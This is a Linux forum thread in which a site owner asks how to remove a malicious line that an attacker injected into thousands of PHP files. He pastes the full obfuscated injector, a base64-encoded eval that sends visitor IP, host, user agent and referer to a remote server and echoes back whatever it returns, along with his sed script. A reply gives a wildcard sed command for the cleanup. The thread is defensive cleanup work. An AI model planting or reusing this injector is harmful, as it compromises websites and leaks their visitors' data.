LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 10-24-2011, 06:14 PM   #1
marco114
LQ Newbie
 
Registered: Aug 2009
Posts: 2

Rep: Reputation: 0
Complex Find and Replace using sed or other tool


SUPER SORRY FOR THE LONG LINE.. I need to explain..

A server of mine was hacked recently and the hacker added a line of code to every .php file in my directory. There's about 4,000 files so I need some script to remove this malicious code below:

PHP Code:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip $_SERVER['REMOTE_ADDR'];$host$_SERVER['HTTP_HOST'];$uri urlencode($_SERVER['REQUEST_URI']);$ref urlencode($_SERVER['HTTP_REFERER']);$url $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref$tmp file_get_contents($url); echo $tmp?>

I want to find and replace it with NOTHING. I have tried sed, but with all these characters, it's not working for me.

I tried putting it in a variable also. No luck.

My Poor Attempt at a Bash Script

Code:
#!/bin/bash
OLD="<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host= $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>"
NEW=""
DPATH="/fixer/orig/*.php"
BPATH="/fixer/orig_bu/foo"
TFILE="/tmp/out.tmp.$$"
[ ! -d $BPATH ] && mkdir -p $BPATH || :
for f in $DPATH
do
  if [ -f $f -a -r $f ]; then
    /bin/cp -f $f $BPATH
   sed "s/$OLD/$NEW/g" "$f" > $TFILE && mv $TFILE "$f"
  else
   echo "Error: Cannot read $f"
  fi
done
/bin/rm -rf $TFILE
 
Old 10-24-2011, 06:42 PM   #2
countach74
Member
 
Registered: Feb 2011
Distribution: Ubuntu 10.04, Debian Squeeze
Posts: 46

Rep: Reputation: 8
You don't need to type in the whole line to sed. Use a wildcard. Something like this should work:

Code:
sed -i 's/<?php $_F=__FILE__;.*//' *.php
Naturally, I would test it first.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Help with sed doing find and replace lostNspace Programming 2 08-25-2011 08:23 PM
find or replace without using sed adarshmca Linux - Newbie 9 12-28-2010 06:41 AM
find or replace through sed adarshmca Linux - Newbie 3 12-28-2010 12:35 AM
How to replace all occurances of a complex string using sed 6millionbucks Programming 6 08-12-2007 12:55 PM
sed - find and replace command bullshit Programming 9 01-05-2006 04:25 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie

All times are GMT -5. The time now is 02:17 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration